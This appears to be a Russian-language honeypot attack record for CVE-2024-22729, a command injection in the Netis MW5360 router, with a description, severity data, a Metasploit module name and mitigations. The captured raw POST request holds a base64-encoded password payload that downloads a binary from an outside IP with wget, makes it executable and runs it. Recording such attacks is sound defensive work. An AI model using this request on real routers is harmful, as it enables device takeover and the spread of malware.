Информация об атаке

Tag
CVE-2024-22729
Date
2024-07-01
Client IP
141.98.83.197
Client GEO
panama 
Vendor
NETIS SYSTEMS 
Product
MW5360 V1.0.1.3031 
RAW request
POST /cgi-bin/skk_set.cgi HTTP/1.0
User-Agent: Go-http-client/1.1
Host: ████████████
Content-Type: application/x-www-form-urlencoded
Content-Length: 167
X-Forwarded-For: █████████████
Connection: close

password=YGNkIC90bXA7IHJtIC1yZiBzaGs7IHdnZXQgaHR0cDovLzQ1Ljk1LjE2OS4xMS9zaGs7IGNobW9kIDc3NyBzaGs7IC4vc2hrIG5ldGlzOyBybSAtcmYgc2hrYA==&quick_set=ap&app=wan_set_shortcut
Description

CVE-2024-22729 - это критическая уязвимость командной инъекции, выявленная в маршрутизаторе NETIS SYSTEMS MW5360 V1.0.1.3031. Эта уязвимость присутствует на странице входа, в частности через параметр пароля. Проблема возникает из-за неправильной обработки и отсутствия очистки пользовательского ввода, что позволяет злоумышленникам внедрять и выполнять произвольные команды на устройстве.

Подробности эксплуатации

Уязвимость может быть использована удаленно без необходимости аутентификации или взаимодействия с пользователем. Злоумышленник может создать вредоносный запрос к странице входа, внедряя команды через параметр пароля. Это может привести к полному компрометации устройства, позволяя злоумышленнику выполнять произвольные команды с теми же привилегиями, что и процесс веб-сервера.

Влияние

Влияние этой уязвимости является серьезным, с оценкой CVSS 9.8. Успешная эксплуатация может привести к полному контролю над затронутым устройством, что может привести к утечке данных, компрометации сети и дальнейшим атакам на подключенные системы. Конфиденциальность, целостность и доступность устройства оцениваются как высокие.

Публичные эксплойты и инструменты

Существует публичный эксплойт для этой уязвимости, который был интегрирован в Metasploit, что делает его легко доступным для злоумышленников. Модуль эксплойта exploit/linux/http/netis_unauth_rce_cve_2024_22729 может быть использован для использования этой уязвимости.

Условия эксплуатации

  • Вектор атаки: Сеть
  • Сложность атаки: Низкая
  • Необходимые привилегии: Нет
  • Взаимодействие с пользователем: Нет
  • Объем: Неизменный
  • Влияние на конфиденциальность: Высокое
  • Влияние на целостность: Высокое
  • Влияние на доступность: Высокое

Ссылки

Mitigations
  1. Обновление прошивки: Проверьте наличие обновлений прошивки от NETIS SYSTEMS и примените любые доступные патчи, устраняющие эту уязвимость.
  2. Сегментация сети: Изолируйте затронутое устройство от критических сегментов сети, чтобы ограничить потенциальный ущерб в случае эксплуатации.
  3. Контроль доступа: Внедрите строгий контроль доступа и ограничьте доступ к веб-интерфейсу устройства только доверенными IP-адресами.
  4. Мониторинг трафика: Используйте инструменты мониторинга сети для обнаружения и реагирования на подозрительную активность, нацеленную на страницу входа устройства.
  5. Отключение ненужных сервисов: Отключите любые ненужные сервисы на маршрутизаторе, чтобы уменьшить поверхность атаки.
  6. Регулярные аудиты: Проводите регулярные аудиты безопасности и оценки уязвимостей для выявления и минимизации потенциальных рисков.